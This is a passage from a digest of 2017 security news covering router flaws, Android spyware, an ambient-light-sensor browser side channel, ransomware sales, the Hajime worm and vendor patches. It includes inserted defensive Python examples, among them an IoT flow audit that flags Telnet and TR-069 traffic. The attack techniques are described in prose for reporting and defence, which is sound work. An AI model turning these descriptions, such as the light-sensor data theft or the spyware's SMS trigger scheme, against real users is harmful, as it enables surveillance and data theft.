The majority of the exposed devices (nearly 69%) are located in the United States, and others are spotted in countries including Canada (almost 10%), Hong Kong (nearly 1.8%), Chile (~1.5%), and the Netherlands (~1.4%).
A small percentage of vulnerable Linksys routers have also been spotted in Argentina, Russia, Sweden, Norway, China, India, UK, and Australia.
Here's How you can Mitigate Attacks originating from these Flaws:
As temporary mitigation, Linksys recommended its customers disable the Guest Network feature on any of its affected products to avoid any attempts at malicious activity.
The company also advised customers to change the password in the default account in order to protect themselves until a new firmware update is made available to patch the problems.
Linksys is working to release patches for the reported vulnerabilities with the next firmware update for all affected devices, so users with Smart Wi-Fi devices should turn on the automatic update feature to get the latest firmware as soon as new versions arrive.
Millions Download "System Update" Android Spyware via Google Play
20.4.2017 securityweek Android
Millions of users looking to get Android software updates have been tricked into downloading spyware on their devices through the Google Play marketplace, Zscaler reveals.
Posing as a legitimate application called “System Update” and claiming to provide users with access to the latest Android software updates, the spyware made it to Google Play in 2014, and had registered between 1,000,000 and 5,000,000 downloads by the time Google was alerted and removed it from the store.
Instead of delivering on its promise, however, the malware spies on users’ exact geolocation and can send it to the attacker in real time. It receives commands from its operator via SMS messages, the security researchers explain.
The application’s Google Play page should have been a warning to users that it wasn’t what it appeared to be, given that it displayed blank screenshots and users were complaining about its lack of functionality, yet many still downloaded and installed it. The page also stated that the “application updates and enables special location features.”
When the user attempts to run the installed app, however, an error message is displayed: “Unfortunately, Update Service has stopped.” In the background, the application sets up an Android service and broadcast receiver to fetch the last known location and scan for incoming SMS messages.
The spyware is looking for incoming messages that feature a specific syntax, Zscaler explains: “the message should be more than 23 characters and should contain ‘vova-’ in the SMS body. It also scans for a message containing ‘get faq’.”
The attacker can set a location alert when the device’s battery is running low, and can also set their own password for the spyware (the application comes with the default password “Vova”). After a phone number and password are set, the spyware starts a process to send the device’s location to the attacker.
“The SMS-based behavior and exception generation at the initial stage of startup can be the main reason why none of the antivirus engines on VirusTotal detected this app at the time of analysis,” Zscaler explains.
The application was last updated in December 2014 and managed to evade detection for a long time, but its functionality remained active. What’s more, the security researchers discovered the same code for stealing a victim’s location as the DroidJack Trojan that was discovered several years ago, and which was recently posing as fake Pokemon GO and Super Mario Run games for Android.
“There are many apps on the Google Play Store that act as a spyware; for example, those that spy on the SMS messages of one’s spouse or fetch the location of children for concerned parents. But those apps explicitly state their purpose, which is not the case with the app [in] this report. It portrayed itself as a system update, misleading users into thinking they were downloading an Android System Update,” Zscaler concludes.
Ambient Light Sensors Put Browser Data at Risk: Researchers
20.4.2017 securityweek Security
The ambient light sensors present in phones, tablets and laptops can be abused to obtain potentially sensitive information from a user’s web browser, researchers warned.
Ambient light sensors measure light intensity in the environment, which is useful for adjusting the brightness of the display and for proximity detection. The data collected by the sensor is fairly precise and the frequency of readings is relatively high.
Last year, researcher Lukasz Olejnik analyzed theoretical security and privacy implications of ambient light sensors. The expert recently teamed up with Artur Janc and they demonstrated how the W3C’s ambient light sensor API can be abused to steal data from web browsers.
Some members of the industry have proposed allowing websites to access ambient and other sensors without requiring explicit permission from the user. Recent versions of Firefox and Chrome have already implemented the W3C API – it’s enabled by default in the former and it can be manually activated in the latter.
Proof-of-concept (PoC) exploits created by the researchers show how an attacker can determine a user’s browsing history based on the color of links, and how they can steal cross-origin resources, such as images and frames.
In order to determine which websites have been visited by a user, Olejnik and Janc relied on the fact that a site can apply different styles to links that have been visited and ones that have not been accessed.
An attacker can create a webpage that sets link styles to white for visited links and black for not-visited links. The attacker’s page then starts displaying a list of popular domain names one by one. If a link has been visited, the screen turns white; if it hasn’t been accessed, it turns black. The ambient sensor can log the light level when each link is displayed, and determine if that website had been accessed by the user.
Researchers also demonstrated how an attacker can steal cross-origin resources, such as account recovery QR codes. In this case, the hacker’s website embeds an image of the QR code from the targeted domain into their own site. The image is converted to monochrome using SVG filters, and it’s scaled so that each pixel is expanded one by one to fill up the screen. The exploit goes through each pixel, and the ambient sensor logs a white or black pixel depending on what is on the screen.
In their experiments, researchers determined that this technique can be used for a fully reliable exploit at a rate of one bit per 500 ms. At this rate, an attacker can exfiltrate an 8-character password in 24 seconds, a 20x20 QR code in 3 minutes and 20 seconds, and a 64x64 pixel image in just over half an hour. As for stealing a user’s browsing history, it takes 8 minutes and 20 seconds to go through 1,000 popular URLs and determine if they have been visited.
While it’s unlikely that such an obvious attack can be carried out while the phone is in use, Olejnik and Janc pointed out that an attack can be conducted at night via a site that uses the screen.keepAwake API to keep the display on while the exploit is running.
Researchers believe these types of attacks could be prevented by limiting the frequency of sensor readings. An even more efficient mitigation involves limiting the precision of sensor output (i.e. make it difficult for the color of the screen to influence the sensor reading).
Attacks can also be prevented if browser vendors require users to grant permission before giving websites access to the sensor. Both Google and Mozilla have been notified of the potential risks.
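To make the proposed mitigations concrete, the following simulation is an added example, not code from Olejnik and Janc's proof-of-concept or from any browser. It models a sensor whose reading is dominated by room light plus a small contribution from the screen, and shows two defender-side measures: coarsening the reported value so that the screen's sub-lux contribution cannot move it between buckets, and bounding the channel's capacity by the permitted reading rate. All lux values, the noise level and the screen leakage figure are constructed assumptions.

```python
"""Simulated ambient-light sensor privacy filter (added illustration).

Not the researchers' PoC: it shows why limiting the precision and the
rate of sensor readings, as the article proposes, closes the side channel.
"""
import math
import random

# Constructed assumptions about the physical channel.
AMBIENT_LUX = 12.0      # a dim room at night
SCREEN_LEAK_LUX = 0.8   # extra light a fully white screen adds at the sensor
NOISE_LUX = 0.1         # sensor noise, standard deviation


def raw_reading(screen_white: bool, rng: random.Random) -> float:
    """High-precision value, as an unmitigated sensor API would expose it."""
    lux = AMBIENT_LUX + (SCREEN_LEAK_LUX if screen_white else 0.0)
    return lux + rng.gauss(0.0, NOISE_LUX)


def coarse_reading(screen_white: bool, rng: random.Random,
                   step: float = 50.0) -> float:
    """Mitigated value: precision limited to 'step' lux, so the screen's
    contribution (well under one lux here) cannot change the bucket."""
    return round(raw_reading(screen_white, rng) / step) * step


def distinguishable(sampler, rng: random.Random, samples: int = 50) -> bool:
    """Defender's check: can readings taken under a white screen be told
    apart from readings under a black one? If the two sets of values
    overlap, a page cannot recover even one bit from the sensor."""
    white = [sampler(True, rng) for _ in range(samples)]
    black = [sampler(False, rng) for _ in range(samples)]
    return min(white) > max(black)


def channel_capacity(readings_per_second: float,
                     distinguishable_levels: int) -> float:
    """Upper bound, in bits per second, on what the screen can leak through
    the sensor: each permitted reading carries at most log2(levels) bits.
    The article's figure of one bit per 500 ms corresponds to two readings
    per second distinguishing two levels (black/white)."""
    return readings_per_second * math.log2(distinguishable_levels)


def seconds_to_leak(bits: int, bits_per_second: float) -> float:
    """Time needed to move 'bits' through a channel of the given capacity."""
    return bits / bits_per_second


if __name__ == "__main__":
    rng = random.Random(1)
    print("raw sensor distinguishable:   ", distinguishable(raw_reading, rng))
    print("coarse sensor distinguishable:", distinguishable(coarse_reading, rng))
    print("20x20 QR code at 2 readings/s:",
          seconds_to_leak(400, channel_capacity(2, 2)), "seconds")
```

With the raw sensor the two distributions of readings never overlap, which is exactly what makes the screen usable as a transmitter; after quantization to 50-lux steps every reading collapses to the same bucket. The capacity function also reproduces the article's arithmetic: 400 bits for a 20x20 code at 2 bits per second is 200 seconds, the 3 minutes 20 seconds quoted above.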
This is How Google Secures Devices for Its 61,000 Employees
20.4.2017 securityweek Safety
Google Details Its Implementation of Tiered Access to Secure Devices for More Than 61,000 Employees
The easiest solution to access control is binary: network access is either granted or denied. It's a blunt tool that doesn't suit the modern business culture of maximizing user productivity and creativity. Granularity in access control, allowing users to access what is needed when it is needed, is a more suitable model for the modern business.
Google chose the Tiered Access model for its own workforce of some 61,000 employees. In a new whitepaper (PDF) and blog published today, it explains that it has "a culture of innovation that requires the freedom and flexibility to connect many different devices to many different assets and services."
This is an attitude that will resonate with many modern businesses.
"Tiered access was implemented in order to provide an access model appropriate for [Google's] very heterogeneous environment. It helps ensure the security of corporate resources while allowing users to make informed trade-offs around access and security controls." Many organizations offer their staff flexibility in the devices they use -- especially where a BYOD policy is in place.
Tiered access is achieved by first analyzing the client base devices and data sources; analyzing the services that are to be accessed; and choosing a gateway/access technology that can evaluate policies and make access decisions between the client base and service.
Google uses its own internally developed tools to collect the device data; but suggests other companies could use security reporting systems (logs), patch management systems, asset management systems and centralized management dashboards. The purpose is to gather device attributes and device state into a central repository.
The device attributes allow the definition of device baselines, based on things like vendor and operating system, and built-in security features. The device state, continuously monitored, highlights deviations from the device baseline. These two attributes can be used to associate devices to the different tiers.
"For example," explains Google, "an Android device at Google may access more sensitive data in higher trust tiers if it is a 'Fully Managed' device, meaning it provides full device control and access to detailed system and network logs." A lower trust tier is made accessible to BYOD devices with a work profile.
Between the device and the service sits an Access Control Engine that provides a service-level authorization to enterprise applications on a per-request basis. It queries the central repository in order to make policy decisions on what access is allowable -- it is where policy is defined and managed by security.
The 'tiers' in tiered access are levels of sensitivity applied to the organization's different services. Google uses just four tiers: untrusted; basic access; privileged access; and highly privileged access. It chose four tiers as a compromise between too many (making the system over-complex), and too few (which effectively recreates the binary access that the tiered approach seeks to improve).
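The pieces the article describes (a central device repository, device baselines, continuously monitored device state, four trust tiers and a per-request access control engine) fit together as shown in this added example. It is not Google's code and the whitepaper does not publish its policy rules: the tier names follow the article, while every device attribute, threshold, service classification and sample device below is a constructed assumption chosen to illustrate the model.

```python
"""Tiered-access decision engine (added illustration, not Google's code)."""
from dataclasses import dataclass
from typing import Dict, Tuple

# Trust tiers from lowest to highest, as named in the article.
TIERS = ["untrusted", "basic", "privileged", "highly_privileged"]

# Constructed assumption: operating systems for which a baseline exists.
SUPPORTED_OS = {"Android", "ChromeOS", "macOS", "Windows"}


@dataclass
class Device:
    """One record in the central repository: attributes plus monitored state."""
    device_id: str
    os: str
    management: str          # baseline: "fully_managed" or "work_profile" (BYOD)
    disk_encrypted: bool     # monitored state
    days_since_patch: int    # monitored state
    last_seen_days_ago: int  # staleness of the state data itself


def compute_tier(d: Device) -> str:
    """Associate a device with a tier. The baseline (management mode) caps the
    tier, mirroring the article's fully-managed vs. work-profile example;
    deviations in monitored state lower it further."""
    if d.os not in SUPPORTED_OS:
        return "untrusted"
    if d.last_seen_days_ago > 7:          # no fresh state: assume nothing
        return "untrusted"
    level = {"fully_managed": 3, "work_profile": 1}.get(d.management, 0)
    if not d.disk_encrypted:              # constructed threshold
        level = min(level, 1)
    if d.days_since_patch > 90:           # constructed thresholds
        level = min(level, 1)
    elif d.days_since_patch > 30:
        level = min(level, 2)
    return TIERS[level]


# Service owners classify each service into a tier (constructed examples).
SERVICE_TIERS = {
    "cafeteria-menu": "basic",
    "source-repo": "privileged",
    "prod-admin-console": "highly_privileged",
}


def authorize(repo: Dict[str, Device], device_id: str,
              service: str) -> Tuple[bool, str]:
    """Per-request decision by the access control engine: query the
    repository, derive the device tier, compare with the service tier."""
    device = repo.get(device_id)
    if device is None:
        return False, "deny: device unknown to repository"
    required = SERVICE_TIERS.get(service)
    if required is None:                   # service never on-boarded
        return False, "deny: service has no tier assignment"
    tier = compute_tier(device)
    ok = TIERS.index(tier) >= TIERS.index(required)
    verdict = "allow" if ok else "deny"
    return ok, f"{verdict}: device tier {tier}, service requires {required}"


# Constructed sample repository.
REPO = {
    "corp-pixel-01": Device("corp-pixel-01", "Android", "fully_managed", True, 5, 0),
    "byod-pixel-02": Device("byod-pixel-02", "Android", "work_profile", True, 5, 0),
    "corp-mac-03": Device("corp-mac-03", "macOS", "fully_managed", True, 45, 0),
    "corp-win-04": Device("corp-win-04", "Windows", "fully_managed", False, 2, 0),
}

if __name__ == "__main__":
    for dev, svc in [("corp-pixel-01", "prod-admin-console"),
                     ("byod-pixel-02", "source-repo"),
                     ("corp-mac-03", "prod-admin-console"),
                     ("corp-win-04", "source-repo")]:
        print(dev, svc, authorize(REPO, dev, svc)[1])
```

Note that an unclassified service is denied rather than silently treated as low risk, which is the failure mode the on-boarding process discussed below has to manage, and that a device whose state data has gone stale drops to untrusted regardless of its baseline.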
While this is the current state of Google's tiered access solution to its on-site and mobile workforces, development is ongoing. It has four areas currently under consideration. The first is to increase the granularity of the system by improving "the precision of access decisions while balancing the need for users to understand security requirements."
The second is to add user attributes to the device attributes by considering "the user’s observed behavior and how that compares to normal activity as analyzed with machine learning." This will allow access based on both the device and current user behavior.
The third is to drive self-selection of trust tiers by encouraging people to voluntarily move across trust tiers in real-time; for example, to be at 'fully trusted' for the next two hours only.
Finally, Google hopes to improve the service on-boarding process. Since services are added or updated all the time, they all need to be classified in terms of risk and sensitivity. "To scale," suggests Google, "service owners must be empowered to make the right tier assignments themselves, which is a process that is constantly improving."
Google hopes that by sharing its own experiences in developing and deploying tiered access, IT and security admins will feel empowered to develop a flexible and powerful access control system that better suits today's business. Its Tiered Access project goes hand-in-hand with the larger BeyondCorp project that challenges traditional security assumptions that private or 'internal' IP addresses represented a 'more trusted' device than those coming from the internet. Part of BeyondCorp is discussed in the Google Infrastructure Security Design Overview.
Anyone can become a hacker. A few thousand crowns is all it takes
20.4.2017 Novinky/Bezpečnost Crime
These days literally anyone can become a hacker. They need no deep knowledge of computer networks, nor do they have to keep hunting for new security holes in various programs. As The Hacker News points out, a few thousand crowns is all it takes.
For more than two years now, ransomware has been the biggest threat according to security experts. The malicious code grouped under that collective name is highly sophisticated and can wreak havoc on a computer.
But anyone who thought that only the most seasoned cybercriminals spread it across the global network would be mistaken. On the internet's black market practically anyone can buy it, much like weapons or drugs.
A ransomware virus made to order
According to The Hacker News, ransomware called Karmen is commonly offered on the black market. Interested buyers can purchase it from the Russian-speaking group DevBitox for a mere $175, roughly 4,400 CZK.
The unwelcome visitor bought this way is ready for an attack out of the box; all that is left is to point it at a pre-selected victim. No further deeper knowledge of computing is required.
An attack by the Karmen malware proceeds exactly like those of other ransomware. It first encrypts all data stored on the hard drive. The attackers then demand a ransom to restore access, easily amounting to several thousand crowns.
Cybercriminals typically try to give the owner of the infected machine the impression that they will regain access to their files after paying a fine, supposedly levied for using illegal software or the like. That is one reason why many people have already paid the ransom.
Do not pay the ransom
They usually want to be paid in bitcoin, because movements of this virtual currency are practically impossible to trace, and by extension so is the cybercriminals' illegal activity.
Even after paying the ransom, however, users do not get their data back. Instead of paying, the virus must be removed from the computer. Recovering data that was not backed up is, in most cases, impossible.
Users can nevertheless prepare for such attacks. It is enough to follow the basic recommendations of security experts, which keep them from needlessly opening a back door into their computers for unwanted visitors.
Russia considers banning VPNs and proxies that provide access to blocked websites
20.4.2017 Živě.cz BigBrother
Russia is among the countries with the largest number of blocked websites. The blacklist of the local authority Roskomnadzor contains almost 70,000 sites that must be blocked at the ISP level. Users, however, circumvent these measures with tools such as VPNs or proxy servers, which Russian institutions dislike. That is why a proposal to block them is now to be discussed at the government level, TorrentFreak reports.
Russia's Roskomnadzor wants Opera to ship a built-in blacklist. Users rely on the browser to view blocked websites
The new law would require providers to block all tools that can be used to visit forbidden sites, primarily the aforementioned VPNs and proxy servers, but also web services for mirroring sites, or Tor. Among others, the definition would also cover Opera, which includes a VPN feature for changing the IP address.
The new proposal follows another measure intended to affect the display of search engine results. All services for searching the web would be prohibited from displaying links to blocked websites; otherwise they face a fine of roughly 310,000 CZK.
The NSA will no longer be able to abuse Windows for spying, Microsoft claims
20.4.2017 SecurityWorld BigBrother
Microsoft is responding to the NSA affair and patching the vulnerabilities the agency used for its espionage purposes. Older versions of Windows, however, are, and will remain, vulnerable.
Microsoft announced that it has fixed most of the critical flaws in Windows allegedly exploited by the National Security Agency (NSA) to spy on users. The hacker group Shadow Brokers drew attention to the agency's activities a few days ago by publishing extensive documentation of them.
"Most of them were gaps falling into risk categories that we had already patched in our other products," said Philip Misner, one of Microsoft's security staff, in an online post describing nine specific cases, including the corrective updates, spanning the period from October 2008 to March 2017.
He also mentions, however, that three of the critical flaws Shadow Brokers pointed to were not patched and will not be.
"Users of Windows 7 and newer, or Exchange 2010 and newer, are not at risk. Those using older versions of these products should update to newer ones in order to be covered by our support." His words make it clear that users of Windows versions older than "Seven" may be exposing themselves to risk because Microsoft's support has ended.
Matt Suiche, founder of security firm Comae Technologies, adds in connection with the leaked documents that the National Security Agency made extensive use of, among other things, flaws in older versions of Windows Server, especially Windows Server 2003.
He therefore strongly recommends that users update their systems or move straight to the latest Windows 10. "Exploiting flaws in Windows 10 is significantly harder than in Windows 7," Suiche adds.
White Hat Hacker Created Mysterious IoT Worm, Symantec Says
20.4.2017 securityweek IoT
Hajime IoT Worm Appears to be Work of White Hat Hacker
An Internet of Things (IoT) worm that targets the same devices as the infamous Mirai botnet appears to be the work of a white hat hacker, Symantec researchers say.
Dubbed Hajime, the worm was initially discovered in October, just weeks after Mirai’s code emerged online, and Rapidity Networks researchers estimated at the time it had infected between 130,000 and 185,000 devices. The malware was using the same username and password combinations as Mirai, and was focused on compromising the very same insecure IoT devices.
At the time, however, Rapidity Networks suggested that the malware could be only a research project, as it had no other components than the spread module. Basically, while Mirai remains focused on ensnaring devices to abuse them in distributed denial of service (DDoS) attacks, Hajime doesn't appear to have a malicious component.
Six months later, nothing has changed in this regard, and the worm continues to pack only the spread module, with its actual purpose still a mystery, Symantec says. However, the security researchers do note that the malware installs a backdoor on the compromised devices, which could be used for nefarious purposes.
At the moment the malware only fetches a statement from its controller and displays it on the terminal approximately every 10 minutes, researchers say. The statement claims that a white hat is behind the code, and that they are “securing some systems.”
The operator has the option to open a shell script to any infected machine in the network at any time, and has designed Hajime to accept only messages signed by a hardcoded key. Thus, it’s clear that the message Hajime displays on the terminal comes from the author.
Hajime is a peer-to-peer botnet, meaning that there is no single command and control (C&C) address that it has to connect to when receiving commands. Instead, its operator can push commands to the network and wait for them to propagate to all peers over time.
The malware appears more advanced compared to Mirai, and researchers discovered that it takes multiple steps in an attempt to hide its presence on the system. Courtesy of Hajime’s modular design, the operator can add new capabilities to it on the fly. According to Symantec, the author has invested a “fair amount of development time” in this creation.
“However, there is a question around trusting that the author is a true white hat and is only trying to secure these systems, as they are still installing their own backdoor on the system. The modular design of Hajime also means if the author’s intentions change they could potentially turn the infected devices into a massive botnet,” the security firm explained.
On the other hand, once it has infected a device, the malware attempts to improve security by blocking access to ports 23, 7547, 5555, and 5358. These ports are already known to be hosting services that are exploitable by many threats, including Mirai.
Hajime’s behavior is similar to that of Wifatch, also known as the “vigilante malware,” and isn’t viewed as an effective approach to securing IoT devices. The effects of white worms are only temporary, because the changes are made only in RAM and do not persist across reboots.
“Once the device is rebooted it goes back to its unsecured state, complete with default passwords and a Telnet open to the world. To have a lasting effect, the firmware would need to be updated. It is extremely difficult to update the firmware on a large scale because the process is unique to each device and in some cases is not possible without physical access,” Symantec said.
This also means that there’s a constant battle between Hajime, Mirai and other IoT malware out there to take over exposed devices. This battle is a cycle that repeats after each device reboot. Only newer, more secure firmware can end it, researchers say.
As it turns out, the worm’s author is keeping track of reports on the malware, and adopted the Hajime name after Rapidity Networks gave the threat that name last year, to keep it in line with Mirai’s Japanese naming (Mirai means “future” in Japanese, Hajime means “beginning”). Further, it appears that the author also addressed some bugs in the code after security researchers pointed them out in their October report.
According to Symantec, while it’s difficult to estimate the size of the network, “modest estimates put it in the tens of thousands.” The researchers also reveal that most of the infected machines are located in Brazil (19%), followed by Iran (17%), Thailand (11%), Russian Federation (11%), Turkey (8%), Vietnam (8%), Argentina (7%), Australia (7%), China (6%), and Taiwan (6%).
“What is needed to protect organizations from the perils of vulnerable IoT devices is a least privilege approach. IoT devices should be hard coded to only communicate with the local server or the manufacturer’s server across the Internet. Organizations should define policies aligned to the IP addresses and layer 4 ports these devices must use to operate and deny all others. Network Traffic Analysis technologies can be used to monitor traffic to and from IoT devices and alert if they send or receive any traffic that falls outside the least privilege policy,” Bob Noel, Director of Strategic Relationships and Marketing for Plixer International, told SecurityWeek in an emailed statement.
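The least-privilege policy Noel describes, and the network traffic analysis that enforces it, can be reduced to a small audit over flow records. The example below is added here and is not Symantec's or Plixer's code: each managed IoT device gets an allow list of (peer network, protocol, service port), every flow touching a managed device is checked against it in both directions, and anything else, including the Telnet and TR-069 ports (23 and 7547) that Hajime itself closes, produces an alert. All addresses, ports and the NetFlow-style sample records are constructed.

```python
"""Least-privilege flow audit for IoT devices (added illustration)."""
import ipaddress
from collections import namedtuple
from typing import Dict, List, Optional, Tuple

# One flow record: constructed, NetFlow-like. dport is the service port.
Flow = namedtuple("Flow", "src dst proto dport nbytes")

# Policy: managed device -> allowed (peer network, protocol, service port).
# Constructed example: a camera that may only talk to the local DNS
# resolver and to the manufacturer's cloud over HTTPS.
POLICY: Dict[str, List[Tuple[str, str, int]]] = {
    "10.0.5.21": [
        ("10.0.5.1/32", "udp", 53),
        ("203.0.113.0/24", "tcp", 443),
    ],
}

# Constructed sample traffic.
SAMPLE_FLOWS = [
    Flow("10.0.5.21", "10.0.5.1", "udp", 53, 120),         # DNS lookup: allowed
    Flow("10.0.5.21", "203.0.113.7", "tcp", 443, 9000),    # vendor cloud: allowed
    Flow("198.51.100.9", "10.0.5.21", "tcp", 23, 300),     # inbound Telnet: alert
    Flow("10.0.5.21", "10.0.5.77", "tcp", 7547, 500),      # lateral TR-069: alert
    Flow("10.0.5.30", "203.0.113.7", "tcp", 443, 100),     # unmanaged device: alert
]


def managed_end(policy: Dict, flow: Flow) -> Optional[Tuple[str, str, int]]:
    """Return (device, peer, service_port) for the managed end of a flow,
    whichever direction it runs in, or None if no managed device is involved."""
    if flow.src in policy:
        return flow.src, flow.dst, flow.dport
    if flow.dst in policy:
        return flow.dst, flow.src, flow.dport
    return None


def permitted(rules: List[Tuple[str, str, int]], peer: str,
              proto: str, port: int) -> bool:
    """Deny-by-default match of one conversation against a device's rules."""
    peer_ip = ipaddress.ip_address(peer)
    return any(peer_ip in ipaddress.ip_network(net)
               and proto == r_proto and port == r_port
               for net, r_proto, r_port in rules)


def audit(policy: Dict, flows: List[Flow]) -> List[Tuple[Flow, str]]:
    """Network-traffic-analysis step: every flow outside policy is an alert.
    Devices with no policy entry are alerted too, because an unclassified
    device is exactly the one that ends up hosting an open Telnet port."""
    alerts = []
    for f in flows:
        end = managed_end(policy, f)
        if end is None:
            alerts.append((f, "unmanaged device: no least-privilege policy"))
            continue
        device, peer, port = end
        if not permitted(policy[device], peer, f.proto, port):
            alerts.append((f, f"{device}: {f.proto}/{port} to/from {peer} "
                              "outside least-privilege policy"))
    return alerts


if __name__ == "__main__":
    for flow, reason in audit(POLICY, SAMPLE_FLOWS):
        print(f"ALERT {flow.src} -> {flow.dst} {flow.proto}/{flow.dport}: {reason}")
```

The same rule set can be exported to a firewall as the deny-all-others policy Noel recommends; the audit is what tells you, after a reboot has wiped Hajime's in-memory port blocks, that the device is once again reachable on the ports it should never have exposed.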
Bose Wireless Headphones Spy on Users, Lawsuit Claims
20.4.2017 securityweek CyberSpy
Bose Headphones Join the Internet of Spying Things
Bose wireless headphones, which sell for up to $350, collect the listening habits of users via an associated app. This data is transmitted to Bose, which then passes it to a marketing company, a lawsuit alleges. One aggrieved user brought the class action suit against Bose, alleging infringement of the federal Wiretap Act and numerous state laws.
Illinois case 17-cv-2928, brought by Bose customer Kyle Zak "on behalf of others similarly situated" claims the case is worth more than $5 million; but without specifying damages, seeks a jury trial.
The lawsuit states that Bose introduced a mobile phone app, the Bose Connect, in 2016 to remotely control and manage the headphones via a Bluetooth connection. Bose advertised this with the claim, the "Bose Connect app unlocks current and future headphone features. Download now."
Unknown to the customer, states the lawsuit, Bose "designed Bose Connect to (i) collect and record the titles of the music and audio files its customers choose to play through their Bose wireless products and (ii) transmit such data along with other personal identifiers to third-parties -- including a data miner -- without its customers' knowledge or consent."
Since Bose also asks for the name, email address and the product's serial number, it is able to build detailed listening profiles of known individuals.
These listening habits can help produce a personal profile of the customer. The lawsuit claims that "numerous scientific studies show that musical preferences reflect explicit characteristics such as age, personality, and values, and can likely even be used to identify people with autism spectrum conditions." Audio podcasts can be even more revealing, potentially identifying the race, religion, sexual orientation and health issues of the listener.
Such privacy issues usually revolve around the concept of informed consent. Zak claims that he would not have purchased the headphones had he been aware of the data collection. The privacy policy with the app, however, makes it clear that Bose collects data, tracks the user and shares that data. "We share the information that we collect with a variety of third parties. Additionally, other third parties collect information directly through the app."
This clear statement would be a red flag to any privacy-conscious user. However, by the time it is seen, the user will almost certainly have already spent up to $350 on the headphones themselves. Although they can function without the app, it is the app that maximizes their quality.
Zak is represented by Christopher Dore, a partner at Edelson PC. According to Reuters, Edelson specializes in suing technology companies over alleged privacy violations. Dore told Reuters that customers do not see the Bose app's user service and privacy agreements when signing up, and the privacy agreement says nothing about data collection.
This last comment is either wrong, or the app's privacy policy has since been updated.
In February 2017, Smart TV manufacturer Vizio agreed to pay an FTC settlement of $2.2 million over allegations that it collected information on users' viewing habits without their knowledge. Although the settlement did not include an admission of 'guilt', Vizio will now prominently display its wish to collect data, and ensure it obtains affirmative express consent.
Late last year, a team of researchers demonstrated how a piece of malware could spy on users by silently turning their headphones into a microphone that can capture audio data from a significant distance. Early this year, German regulators banned an internet-connected doll called "My Friend Cayla" after warning that it was a de facto "spying device".
Experts Find 10 Flaws in Linksys Smart Wi-Fi Routers
20.4.2017 securityweek Vulnerebility
Researchers at IOActive have analyzed Linksys routers and discovered a total of 10 vulnerabilities. Patches have yet to be released, but the vendor has provided some mitigation advice.
The research has focused on Linksys routers that support the Smart Wi-Fi feature, which enables users to manage and control their home wireless network remotely from a mobile application. According to Linksys, the vulnerabilities found by IOActive affect 25 EA and WRT series routers.
IOActive will not disclose any specific information until Linksys releases firmware updates and users have had a chance to patch their devices. However, experts said the vulnerabilities they have identified can be exploited to cause a denial-of-service (DoS) condition, obtain potentially sensitive data, and even to plant backdoors.
Two of the flaws can be used for DoS attacks. Unauthenticated hackers can cause the router to become unresponsive or reboot by sending specially crafted requests to a specific API. Exploitation of these flaws disrupts network connections and prevents device administrators from accessing the web interface.
Authentication bypass vulnerabilities allow attackers to access certain CGI scripts that provide access to various types of information, including firmware and Linux kernel versions, running processes, connected USB devices, and the WPS PIN. Attackers can also collect data on firewall configurations, FTP settings, and SMB server settings.
IOActive also warned that attackers who do manage to log in to the router can inject and execute commands on the device’s operating system with root privileges. This allows them to create backdoor accounts that are not visible to legitimate administrators.
However, researchers pointed out that they did not manage to find an authentication bypass that can allow an attacker to exploit this vulnerability – the authentication bypass they did find only provides access to some CGI scripts, not the API that enables these more damaging attacks.
A Shodan search conducted by IOActive revealed 7,000 vulnerable devices that can be accessed directly from the Internet. Nearly 70 percent of them were located in the United States, followed by Canada, Hong Kong, Chile, Netherlands, Venezuela, Argentina, Russia, Sweden, Norway, China, India, UK and Australia.
While researchers have not found a way to bypass authentication in order to exploit the command injection vulnerability, they did determine that 11 percent of the 7,000 exposed devices had been using default credentials.
IOActive reported the vulnerabilities to Linksys in mid-January. The vendor is working on releasing firmware updates for affected devices and, in the meantime, it has provided some mitigation advice. The company recommends temporarily disabling the Guest Network feature, and changing the default admin password.
This research was conducted just a few months after IOActive reported finding multiple vulnerabilities in BHU Wi-Fi uRouter, a device manufactured and sold in China.
Cisco Fixes Serious Flaws in Security, Other Products
20.4.2017 securityweek Vulnerebility
Cisco has released software updates for its Firepower, IOS, Adaptive Security Appliance (ASA) and Unified Communications Manager (Unified CM) products to address high severity denial-of-service (DoS) vulnerabilities.
One of the flaws, identified as CVE-2016-6368, can affect several products running Cisco Firepower System Software, including ASA, Advanced Malware Protection (AMP), Firepower, Sourcefire 3D and Industrial Security appliances. An unauthenticated attacker can exploit the vulnerability remotely to cause a DoS condition.
Related: Cisco Launches New Firepower Firewalls
A DoS vulnerability (CVE-2017-3808) that can be exploited by a remote, unauthenticated attacker has also been found in Cisco Unified CM, namely in the session initiation protocol UDP throttling process.
Several high severity DoS flaws have also been discovered in the EnergyWise module of Cisco’s IOS and IOS XE software. EnergyWise is designed for monitoring and managing the power usage of devices in a domain, including networking devices and Power over Ethernet (PoE) endpoints.
Cisco has also published four advisories describing remotely exploitable weaknesses in its ASA software. The security holes affect components such as the IKEv1 XAUTH code, the SSL/TLS code, IPsec code and DNS code.
Two of the vulnerabilities can be exploited by an unauthenticated attacker, while the other two require authentication.
Most of these flaws have been discovered by Cisco itself and there is no evidence that any of them have been exploited for malicious purposes.
Cisco is one of the several tech companies whose products have been targeted by exploits described recently by WikiLeaks as part of a dump called “Vault 7.” The networking giant has discovered a zero-day vulnerability affecting many of its switches.
Patches have yet to be made available for the flaw and Cisco warned customers last week that a researcher has released a proof-of-concept (PoC) exploit.
Exploits: how great is the threat?
20.4.2017 Kaspersky Exploit
How serious, really, is the danger presented by exploits? The recent leak of an exploit toolset allegedly used by the infamous Equation Group suggests it’s time to revisit that question. Several zero-days, as well as a bunch of merely ‘severe’ exploits apparently used in-the-wild were disclosed, and it is not yet clear whether this represents the full toolset or whether there’s more to come, related to either Equation or another targeted threat actor.
Of course, Equation Group is not the first, and is certainly not the only sophisticated targeted attacker to use stealthy, often zero-day exploits in its activity.
Today we are publishing an overview of the exploit threat landscape. Using our own telemetry data and intelligence reports as well as publically available information, we’ve looked at the top vulnerabilities and applications exploited by attackers.
We have examined them from two equally important perspectives. The first part of the report summarises the top exploits targeting all users in 2015-2016, and the most vulnerable applications. The second part considers the vulnerabilities exploited between 2010 and 2016 by significant targeted threat actors reported on by Kaspersky Lab: that’s 35 actors and campaigns in total.
Key findings on exploits targeting all users in 2015-2016:
In 2016 the number of attacks with exploits increased 24.54%, to 702,026,084 attempts to launch an exploit.
4,347,966 users were attacked with exploits in 2016 which is 20.85% less than in the previous year.
The number of corporate users who encountered an exploit at least once increased 28.35% to reach 690,557, or 15.76% of the total amount of users attacked with exploits.
Browsers, Windows, Android and Microsoft Office were the applications exploited most often – 69.8% of users encountered an exploit for one of these applications at least once in 2016.
